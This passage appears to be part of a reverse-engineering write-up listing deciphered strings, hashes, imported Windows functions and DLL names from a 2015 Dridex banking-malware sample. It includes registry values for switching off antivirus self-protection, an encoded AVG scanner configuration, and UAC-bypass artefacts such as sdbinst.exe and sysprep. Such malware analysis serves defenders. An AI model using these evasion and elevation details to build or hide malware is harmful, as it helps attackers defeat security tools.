26	SYSTEM/CurrentControlSet/services/MBAMProtector/Parameters
27	ProductPath
28	\mbam.dll
29	ProtectionStop
30	SchedulerStop
31	SelfProtectionDisable
32	.KB
33	DisplayName
34	DisplayVersion
35	SOFTWARE/ESET/ESET Security/CurrentVersion/Info
36	SYSTEM/CurrentControlSet/services/Avg/SystemValues
37	SOFTWARE/Avira/Antivir Desktop
38	49E908752A216D26486BFFA9E2D6EF2D368975D62A7B7532B76E547A14FDBAAD8062E3CE8838CEB5E414A393662135499048B521F24528A13923CB2B17DCD943C28F8E
39	68F81F7F2D7E5D0C4830C3D6FAD8F1381D8D79FB2D6E6836BF5D1A3B15A6F6E7810DF4DEA56182F1B75FD9CC38616113CE37B123A75A3FB67E60DF2C29C89D6FCEC3DEB0DAD5ECA48F0F4966CFDEBF10BAE76ED2577A02434E25A597FB473535C4F5BF7B783784AABD9CB6F491A6DA8B00498FD4F0A791B1FF79ABDBBA4A26DD8672AFD74667EFBEFB8A9EA406063DB21C1352ED1A7869F8ECA3EEB5744C84B6772F266D2AE7BF2BC436DA688F9BAF9CAB6E9370BF8C6018B1F55C88ED15A8E4E74D9F4324DA5F6241F7AE7E0DE05D4CAF83AE0CCFFCEB7A1C47796013D1C16F314B17EBBF4E2D2EF54B89FD9E1B94400072E88B7469C5D2F0D9C892625C582E53A96760096B857E8FA51BBCE98DF4150467F0358C660AF1AFB44AA20A7324892A334786CF450F734853E0A6317FFDA0A71927122CF3AEED3741A1A8CAABDDCF0C094DD03E2A74A64EC86E2689D5CA6D77ABFFF7C0FA97186831037840ADF0EEB61309B8AA65FF1628B8B7ED3C3F5ED66AE9711DA38BF0CA6AF768F352E71F392D57D5B3989E10FC4513DB3594120988FDC361AFE9F4741087F1CC58E1F3D5E1D5660D46A24C2B7B9B8138A2DB4A0E57CDDCD0AE3DFBCA2F3A9C7CDD69A915F57DB467627478DF604177CD2A2F83B52B105F8751ADB9D8B3C1EF4FF4FEAFE20BA94634F0918DD04810431A7E3CD42882CE9BB365B4C94785521FDBFE77006E9B1D3E78FE4452B2F5830AE0CBBF664BF44DF70E5B6AD8701516BCBD1D84A746A83ADE1CDA933C8EA800D5A76038C3CB940E25A38DF4867516CAB4301BDC3B564637341F3D971A765F0EE3F15308B1F3487E3BB32C921301FCD014DAB001F2C23FB93F57D1D58152821694A7347F02F5BE2ACF16AA63AD17B061DFF253FBD71306ABF40124A6E87ED148CE005F94D5EA11E094EC0D6620415BBB87FE7BAE8D947A5CE23B2BB8944F95C627DF07E909018C6D579C012DA69526A9EB92AF2F1CAA39035BA877A4C26CFEA25A310FBD81F0FBB0237CAC19D012F09891208848AE4338F530CD59C0730E46A36A40EF5D7FFF8BBF4EE95236C77F442F7633F46A76ADB1767CDC18CE7BF8E2F42C20E213A189478F2D3CFA6628C4C770F56C05BB6C7D4EC886CAFCA019DAAD72B1FA2A4C92D1EADD5F8A318095F8328A3B30120980E2AB6410DE9C927AE8CA86E0758BAE1576AC04038B863A97AFCB08E9179F85506DAC60F28461E958F7F74CE15DE69D56D18FA679A9C6217880315EAC50F43365ABA394BDD6BB0527363B610A43CC5B204070BB7F8656A7B3559CC841920F4791A6DE0A4A6A883284827A5393A18DDC1967F58C3B3168CA8E260B7B2D909B76161EF63228D6BD24D942F1DA98B236CE57700688F44843B4EE8EAD945C254ABDAF6D1670CBE3A183773691F5531630A8091C9606F8F9F17DB44EE9551F942E030EADCBBEE8C381BB529737F14E2EEBD4CC4F7FD1B3BB6D41918FD864F530EF867F5FA3CBAC423821C4CE7C476572BB2D033032DD54F2513518C37127148E1C6FDE5A6BE01FDA2C760398839A901CD78E7DF612C1D1849779AE8B9051A2AAEAF44ED281127783EBF7DABF188A6232217A9F01307D3E5356E29A63C323BCF6AA53C10C1FA03CFE29576947D1F68E2EEA6BF0E8F7276325E69A0A52900E0F00F335B57C2D4900999DA16188D2E393FB17CF9059FD022F2753DEB8E9E4D273419C5BC57D9BCD502D893670DF9B5A535EEAC18F423A350BE97748DCACC57B149F6D89899E5294B150E9904042AE51F538CFC5E112429F56024422D611DF888601E42D65604FE5F9FF31F7AC3A31D269F38ED65330C178E0DC6376F87711064D9AF275A590B7348E18533E4FC52DF97457DEF22B47E8A303C8C19CFAD54C47746E1ECE8A6B2FFE4D81CBA6C46D4F9999D37358020FF024F9A4AC915C40801F03987544EB2D377A58F9F97E3B44D78EC3B392D93AE7F4FBE092A0BCB9D06DB041FF448A1D71047BA80A8F6F5E502030BC0D09746F5CEA0B2688EE4E13184196DE7BB32F57CAE31C97778F6B8943A10C9EBDB37385AA7A8AD53D659BD69121075FDEF85684BA69166FD3F91B7E6FE09C3A9B2B9DEECA38DE9F962021A661CDB9E798B5ED2A70D5F738C8C19C042127A7D509E4FB6F4EF7EE4B15663E4CF0F6F7F05DB0C2A10F2B4650FF6CF07640B3587BD7635B47967C5816C61130B30887B3577718505A67CA2A153A01F6739D061BFCD8B798CE8EE332DA2D1FEB886D11F5D4AE4950E8B9FF24C4AA0F97E8BE0115E8DA6F2F8AF3E5BC99298A76F4D620229C4A23E321C877D69481A3BEC90B30F9CEC08A387E4AE793B66DBCB0CE9B153D3A2439D6F1AF8247721FEFF4F6F25003DA2040C6C97282026F04FECC061248A067D9D8F9478220377DF61E23549684D32428DC52C92506FECB2F13CAE5D91F8F8478BE4C544CE37BF6C109C84CE8D6B274FFB5F952E7989E9FE57F21C0DF2F8CD187795ADF28DEF82DDCF7A727DADA145126E08A3AF446D2703C232815CB1A2F51B75477A02E4CD648B885996AAC2C029788FB1991E65855615AC3A4C660ECC3B8ED81C68520EB26BEEAFF7C8EB78B4CED5E46E4F0D24C71FEDBDA3B9D95C99DF0B1F346D767955C4A7117888AA54E1104F23B68E3F0B7F4B616CB89611CBF7D831300B3596D31A82FA7DBAD247C01D909D4A1060F7193ECC8
40	15BD8DF1CF68952A618DA1AE82BBCE99F27C897605763FC37B53B5CEAFD12CF340E4A08F5AEBC540D5D4E71B9A22A0E7F21346A6B6061BF4474A1F9EDD5C7A8BA057F506F6C74AC031CC61850161C9E7F2455148409F392F072F8C40B495C76BDA48424D977381C05884DB2DF83CFB832D56CDC874B3C50A25B7281688F66AFAD1166632842AB471F25DF69AD3C8C769CDC83CBAA2A5D79C81A817A09E0DF4D8D1C68DE77C4356FF371442299EC4AC957CEEEB2F4BCB9D2285A6B542734986D86A9A3449B46FD64636FE4894DD38E55B142B3AD6EAAD6F93E9162ADC47E963F9FF1D60CB9CFB5B970469327A8D3107B2D6549D4737B8E4C46F937FA4234325C880A9
41	2300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023000D000A0023002000240041005600240043004F004E00460049004700550052004100540049004F004E00240049004E0049000D000A002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023000D000A002300200054006800690073002000660069006C006500200068006100730020006200650065006E002000630072006500610074006500640020006100750074006F006D00610074006900630061006C006C0079002E000D000A002300200044004F0020004E004F00540020004D004F004400490046005900210021000D000A002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023002300230023000D000A000D000A005B00430046004700500052004F00460049004C0045005D000D000A000D000A005B0043004F004D004D004F004E005D000D000A000D000A005B005300430041004E004E00450052005D000D000A004200650066006F007200650041006300740069006F006E0054006F00510075006100720061006E00740069006E0065003D0030000D000A0042006F006F007400730065006B0074006F007200530074006100720074003D0030000D000A004D006100730074006500720042006F006F00740053006500630074006F00720073003D0030000D000A004E006F004E00650074004400720076003D0030000D000A005000720069006D0061007200790041006300740069006F006E0046006F00720049006E006600650063007400650064003D0035000D000A005300630061006E0041006300740069006F006E004D006F00640065003D0030000D000A005300630061006E0041006C006C00460069006C00650073003D0030000D000A005300630061006E0041007200630068006900760053006D0061007200740045007800740065006E00730069006F006E0073003D0031000D000A005300630061006E00410072006300680069007600650043007500740052006500630075007200730069006F006E00440065007000740068003D0031000D000A005300630061006E0041007200630068006900760065004500780063006C007500640065003D000D000A005300630061006E00410072006300680069007600650052006500630075007200730069006F006E00440065007000740068003D00320030000D000A005300630061006E0041007200630068006900760065005300630061006E003D0030000D000A005300630061006E0043006800650063006B00530079007300740065006D00460069006C00650073003D0030000D000A005300630061006E00440069006600660045007800740065006E00730069006F006E003D000D000A005300630061006E00480065007500720069007300740069006300460069006C0065003D0031000D000A005300630061006E00480065007500720069007300740069006300460069006C00650045006E00610062006C00650064003D0030000D000A005300630061006E004800650075007200690073007400690063004D006100630072006F0045006E00610062006C00650064003D0030000D000A005300630061006E0049006E007400650072006100630074006900760065004D006F00640065003D0031000D000A005300630061006E005000720069006F0072006900740079003D0031000D000A005300630061006E00520065006700690073007400720079003D0030000D000A005300630061006E005200650070006F00720074004C006500760065006C003D0030000D000A005300630061006E0052006F006F0074006B006900740073003D0030000D000A005300630061006E0053006B00690070004F00660066006C0069006E006500460069006C00650073003D0030000D000A005300630061006E0053006B0069007000520065007000610072007300650050006F0069006E0074003D0031000D000A005300650063006F006E00640061007200790041006300740069006F006E0046006F00720049006E006600650063007400650064003D0035000D000A00530068006F0077005700610072006E0069006E0067004D0065007300730061006700650073003D0030000D000A00530074006F00700041006C006C006F007700650064003D0031000D000A0055007300650050006500720066006F0072006D0061006E00630065005300630061006E003D0030000D000A000D000A005B0053004B0049005000460049004C00450053005D000D000A00500061007400680030003D0043003A005C00500072006F006700720061006D002000460069006C00650073002000280078003800360029000D000A00500061007400680031003D0063003A005C00700072006F006700720061006D002000660069006C00650073005C000D000A00500061007400680032003D0043003A005C00500072006F006700720061006D0044006100740061005C000D000A00500061007400680033003D0063003A005C00770069006E0064006F00770073000D000A000D000A005B00470055004100520044005D000D000A004100720063004D0061007800460069006C00650063006F0075006E0074003D00310030000D000A004100720063004D006100780052006100740069006F003D003200350030000D000A004100720063004D006100780052006500630075007200730069006F006E003D0031000D000A004100720063004D0061007800530069007A0065003D0031003000300030000D000A004100720063005300630061006E003D0030000D000A004700750061007200640044006500610063007400690076006100740065006400420079005700530043003D0030000D000A004D006100630072006F00560069007200750073004800650075007200690073007400690063003D0030000D000A004D006100780069006D0075006D004C006F006700460069006C006500530069007A0065003D0030000D000A004F006E004100630063006500730073004200610063006B00750070004C006F0067003D0030000D000A004F006E00410063006300650073007300430061006300680065004E006500740077006F0072006B004100630063006500730073003D0031000D000A004F006E004100630063006500730073004500780063006C00750064006500500072006F0063006500730073004E0061006D00650073003D000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730030003D006500780070006C006F007200650072002E006500780065000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730031003D0073006400620069006E00730074002E006500780065000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730032003D00730070006F006F006C00730076002E006500780065000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730033003D0073007600630068006F00730074002E006500780065000D000A004F006E004100630063006500730073004500780063006C007500640065006400500072006F00630065007300730034003D00770069006E006C006F0067006F006E002E006500780065000D000A004F006E0041006300630065007300730045007800740065006E00730069006F006E004C006900730074003D000D000A004F006E00410063006300650073007300460069006C0065004500780063006C007500730069006F006E0043006F0075006E0074003D0031000D000A004F006E004100630063006500730073005300630061006E0041006C006C00460069006C00650073003D0030000D000A004F006E004100630063006500730073005300630061006E004C006F00630061006C004400720069007600650073003D0031000D000A004F006E004100630063006500730073005300630061006E004E006500740077006F0072006B004400720069007600650073003D0030000D000A004F006E004100630063006500730073005700720069007400650043006F006E0066006900670054006F004C006F0067003D0030000D000A00500061007400680030003D0063003A005C000D000A005200650070006F007200740069006E0067004C006500760065006C003D0030000D000A005500730065004500760065006E0074006C006F0067003D0030000D000A00550073006500570068006900740065006C006900730074005300650072007600650072003D0030000D000A00570069006E00330032004800650075007200690073007400690063003D0030000D000A00570069006E00330032004800650075007200690073007400690063004D006F00640065003D0031000D000A000D000A005B0050004F005000330043004F004E004600490047005D000D000A000D000A005B00530045004E0044004D00530047005D000D000A000D000A005B005500500044004100540045005D000D000A0043006C006F007300650043006F006E006E0065006300740069006F006E003D0031000D000A00440055004E0043006F006E006E0065006300740069006F006E003D002A00440055004E002A00570049004E002A0043004F004E004E004500430054002A000D000A00440055004E00500068006F006E00650062006F006F006B003D000D000A004400690061006C00550070004C006F00670069006E003D000D000A004400690061006C0055007000500061007300730077006F00720064003D000D000A0044006F0077006E006C006F00610064004C006F0063006100740069006F006E003D0031000D000A00500072006F0064007500630074005500700064006100740065004D006F00640065003D0030000D000A000D000A005B0056004400460043004800450043004B005D000D000A000D000A005B004500560045004E0054004C004F0047005D000D000A000D000A005B005200450050004F005200540053005D000D000A000D000A005B00570045004200470055004100520044005D000D000A000D000A005B004200410043004B00550050005D000D000A000D000A005B0057004D0049005D000D000A000D000A005B0048004900500053005D000D000A005B004D0041004E0041004700450044004600490052004500570041004C004C005D000D000A004600690072006500770061006C006C0043006F006E00660069006700750072006100740069006F006E003D007B0022006D0061006E0061006700650064004600690072006500770061006C006C00220020003A0020007B0022007000750062006C0069006300220020003A0020007B00220073007400610074006500220020003A00200031002C0022006E006F007400690066007900220020003A00200031002C00220062006C006F0063006B0049006E00220020003A00200030007D002C0022007000720069007600610074006500220020003A0020007B00220073007400610074006500220020003A00200031002C0022006E006F007400690066007900220020003A00200031002C00220062006C006F0063006B0049006E00220020003A00200030007D007D007D000D000A00
42	Global\
43	Starting path:

Third strings block :

Deciphered strings (3/5) of Dridex Botnet 120 Malware
-----------------------------------------------------
Date... : June 08, 2015
MD5.... : 7AC7416FCAB7745F9000EA3E281C8318
SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
Offsets : 0x40DB40-0x40DCEF (PE file offsets : 0xCB40-0xCCEF)

Count	String
0	LOCALAPPDATA
1	S:(ML;;NW;;;LW)
2	Low\%s
3	.sdb
4	.bat
5	open
6	sdbinst.exe
7	iscsicli.exe
8	/q "%s"
9	\System32\
10	\SysWOW64\
11	GET
12	POST
13	sysprep
14	cryptbase.dll
15	Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}

Imports functions names :

Deciphered strings (4/5) of Dridex Botnet 120 Malware
-----------------------------------------------------
Date... : June 08, 2015
MD5.... : 7AC7416FCAB7745F9000EA3E281C8318
SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
Offsets : 0x40DCF0-0x40F257 (PE file offsets : 0xCCF0-0xE257)

DLL_ID	Function_name
001	LoadLibraryA
001	LoadLibraryW
001	GetProcAddress
001	AllocConsole
001	CancelIoEx
001	CloseHandle
001	CompareStringA
001	CompareStringW
001	CreateDirectoryW
001	CreateEventA
001	CreateFileMappingW
001	CreateFileA
001	CreateFileW
001	CreateMutexA
001	CreateProcessW
001	CreateRemoteThread
001	CreateThread
001	CreateToolhelp32Snapshot
001	DeleteFileA
001	DeleteFileW
001	DeviceIoControl
001	DisableThreadLibraryCalls
001	DuplicateHandle
001	ExitProcess
001	ExitThread
001	ExpandEnvironmentStringsA
001	ExpandEnvironmentStringsW
001	FileTimeToDosDateTime
001	FileTimeToLocalFileTime
001	FileTimeToSystemTime
001	FindClose
001	FindFirstFileA
001	FindFirstFileW
001	FindNextFileA
001	FindNextFileW
001	FreeConsole
001	FreeLibrary
001	GetCommandLineW
001	GetCurrentProcess
001	GetCurrentProcessId
001	GetCurrentThread
001	GetCurrentThreadId
001	GetDriveTypeW
001	GetEnvironmentVariableA
001	GetEnvironmentVariableW
001	GetExitCodeProcess
001	GetExitCodeThread
001	GetFileAttributesW
001	GetFileInformationByHandle
001	GetFileSize
001	GetLastError
001	GetLocalTime
001	GetLogicalDrives
001	GetModuleFileNameA
001	GetModuleFileNameW
001	GetModuleHandleA
001	GetModuleHandleW
001	GetProcessHeap
001	GetShortPathNameA
001	GetShortPathNameW
001	GetStartupInfoW
001	GetStdHandle
001	GetSystemDirectoryW
001	GetSystemInfo
001	GetSystemTime
001	GetSystemTimeAsFileTime
001	GetTempFileNameA
001	GetTempFileNameW
001	GetTempPathW
001	GetThreadPriority
001	GetTickCount
001	GetVersionExW
001	GetWindowsDirectoryW
001	GlobalLock
001	GlobalUnlock
001	HeapCreate
001	HeapDestroy
001	HeapAlloc
001	HeapFree
001	HeapReAlloc
001	IsBadReadPtr
001	IsDebuggerPresent
001	IsProcessorFeaturePresent
001	IsWow64Process
001	LocalAlloc
001	LocalFree
001	MapViewOfFile
001	MultiByteToWideChar
001	OpenEventA
001	OpenMutexA
001	OpenProcess
001	OpenThread
001	OutputDebugStringA
001	PeekConsoleInputA
001	Process32FirstW
001	Process32NextW
001	QueryDosDeviceW
001	QueryPerformanceCounter
001	QueryPerformanceFrequency
001	ReadConsoleInputA
001	ReadFile
001	ReadProcessMemory
001	ReleaseMutex
001	RemoveDirectoryW
001	ResetEvent
001	ResumeThread
001	SetEvent
001	SetFileAttributesA
001	SetFileAttributesW
001	SetFilePointer
001	SetFileTime
001	SetLastError
001	SetThreadPriority
001	Sleep
001	SystemTimeToFileTime
001	SuspendThread
001	TerminateProcess
001	TerminateThread
001	TlsAlloc
001	TlsFree
001	TlsGetValue
001	TlsSetValue
001	Thread32First
001	Thread32Next
001	UnmapViewOfFile
001	VirtualAlloc
001	VirtualAllocEx
001	VirtualFree
001	VirtualFreeEx
001	VirtualProtect
001	VirtualQuery
001	WaitForMultipleObjects
001	WaitForSingleObject
001	WideCharToMultiByte
001	WriteConsoleA
001	WriteFile
001	WriteProcessMemory
005	AllocateAndInitializeSid
005	CloseServiceHandle
005	ConvertStringSecurityDescriptorToSecurityDescriptorW
005	CryptAcquireContextW
005	CryptCreateHash
005	CryptDecrypt
005	CryptDestroyHash
005	CryptDestroyKey
005	CryptEncrypt
005	CryptExportKey
005	CryptGenKey
005	CryptGenRandom
005	CryptGetHashParam
005	CryptGetUserKey
005	CryptHashData
005	CryptImportKey
005	CryptReleaseContext
005	CryptSignHashW
005	CryptVerifySignatureW
005	EqualSid
005	FreeSid
005	GetSidSubAuthority
005	GetSidSubAuthorityCount
005	GetTokenInformation
005	IsValidSid
005	OpenProcessToken
005	OpenSCManagerW
005	OpenServiceW
005	QueryServiceStatus
005	RegCloseKey
005	RegCreateKeyExA
005	RegDeleteValueA
005	RegEnumKeyA
005	RegEnumValueA
005	RegOpenKeyExA
005	RegQueryValueExA
005	RegQueryValueExW
005	RegSetValueExA
011	EnumProcessModulesEx
011	GetModuleBaseNameW
011	GetModuleInformation
011	GetProcessImageFileNameW
002	LdrGetDllHandle
002	LdrGetProcedureAddress
002	NtDuplicateObject
002	RtlComputeCrc32
002	RtlCreateUserThread
002	RtlFillMemory
002	RtlInitUnicodeString
002	RtlMoveMemory
002	RtlZeroMemory
002	RtlQueryElevationFlags
002	NtAllocateVirtualMemory
002	NtFreeVirtualMemory
002	NtProtectVirtualMemory
002	NtReadVirtualMemory
002	NtWriteVirtualMemory
002	NtQueryInformationProcess
002	NtQueryObject
002	NtQuerySystemInformation
002	NtQueryVirtualMemory
009	CommandLineToArgvW
009	SHCreateItemFromParsingName
009	ShellExecuteExW
009	SHGetFolderPathW
007	SHDeleteKeyA
007	StrChrIA
007	StrChrIW
007	StrStrIA
007	StrStrIW
007	StrToIntA
007	StrToIntW
007	StrToIntExA
007	StrToIntExW
007	wvnsprintfA
007	wvnsprintfW
010	CertCloseStore
010	CertEnumCertificatesInStore
010	CertOpenSystemStoreW
010	CryptBinaryToStringA
010	CryptDecodeObject
010	CryptDecodeObjectEx
010	CryptEncodeObject
010	CryptEncodeObjectEx
010	CryptExportPublicKeyInfo
010	CryptImportPublicKeyInfo
010	CryptStringToBinaryA
010	PFXExportCertStoreEx
012	BitBlt
012	CreateCompatibleBitmap
012	CreateCompatibleDC
012	DeleteDC
012	DeleteObject
012	SelectObject
003	__WSAFDIsSet
003	accept
003	bind
003	closesocket
003	connect
003	freeaddrinfo
003	getaddrinfo
003	gethostbyname
003	getsockopt
003	htons
003	ioctlsocket
003	listen
003	ntohs
003	recv
003	select
003	send
003	setsockopt
003	shutdown
003	socket
003	WSAEnumNetworkEvents
003	WSAEventSelect
003	WSAGetLastError
003	WSAGetOverlappedResult
003	WSARecv
003	WSASend
003	WSASetEvent
003	WSASetLastError
003	WSAStartup
004	CallWindowProcW
004	CharLowerA
004	CharLowerW
004	CharUpperA
004	CharUpperW
004	GetClipboardData
004	EnumWindows
004	ExitWindowsEx
004	GetClassNameW
004	GetCursorPos
004	GetDC
004	GetKeyboardState
004	GetSystemMetrics
004	GetWindowTextW
004	GetWindowThreadProcessId
004	MessageBoxA
004	MessageBoxW
004	ReleaseDC
004	SetForegroundWindow
004	SwitchToThisWindow
004	ToUnicode
004	TranslateMessage
008	InternetOpenUrlA
008	InternetOpenUrlW
008	InternetSetStatusCallbackA
008	InternetSetStatusCallbackW
008	InternetOpenA
008	InternetOpenW
008	InternetConnectA
008	InternetConnectW
008	HttpAddRequestHeadersA
008	HttpAddRequestHeadersW
008	HttpOpenRequestA
008	HttpOpenRequestW
008	HttpSendRequestA
008	HttpSendRequestW
008	InternetQueryOptionA
008	InternetQueryOptionW
008	InternetSetOptionA
008	InternetSetOptionW
008	HttpQueryInfoA
008	HttpQueryInfoW
008	InternetQueryDataAvailable
008	InternetReadFile
008	InternetReadFileExA
008	InternetReadFileExW
008	InternetCloseHandle
006	FCIAddFile
006	FCICreate
006	FCIDestroy
006	FCIFlushCabinet
013	SCardEstablishContext
013	SCardGetStatusChangeW
013	SCardListReadersW
013	SCardReleaseContext
014	WTSEnumerateSessionsW
014	WTSFreeMemory
014	WTSQueryUserToken
015	CoCreateInstance
015	CoGetObject
015	CoInitialize
015	CoUninitialize
004	GetWindowLongW
004	SetWindowLongW	

And lastly, Imports modules ID and names :

Deciphered strings (5/5) of Dridex Botnet 120 Malware
-----------------------------------------------------
Date... : June 08, 2015
MD5.... : 7AC7416FCAB7745F9000EA3E281C8318
SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
Offsets : 0x40F258-0x40F3CB (PE file offsets : 0xE258-0xE3CB)

DLL_ID	DLL_Name
0	-
1	kernel32.dll
2	ntdll.dll
3	ws2_32.dll
4	user32.dll
5	advapi32.dll
6	cabinet.dll
7	shlwapi.dll
8	wininet.dll
9	shell32.dll
10	crypt32.dll
11	psapi.dll
12	gdi32.dll
13	WinSCard.dll
14	wtsapi32.dll
15	ole32.dll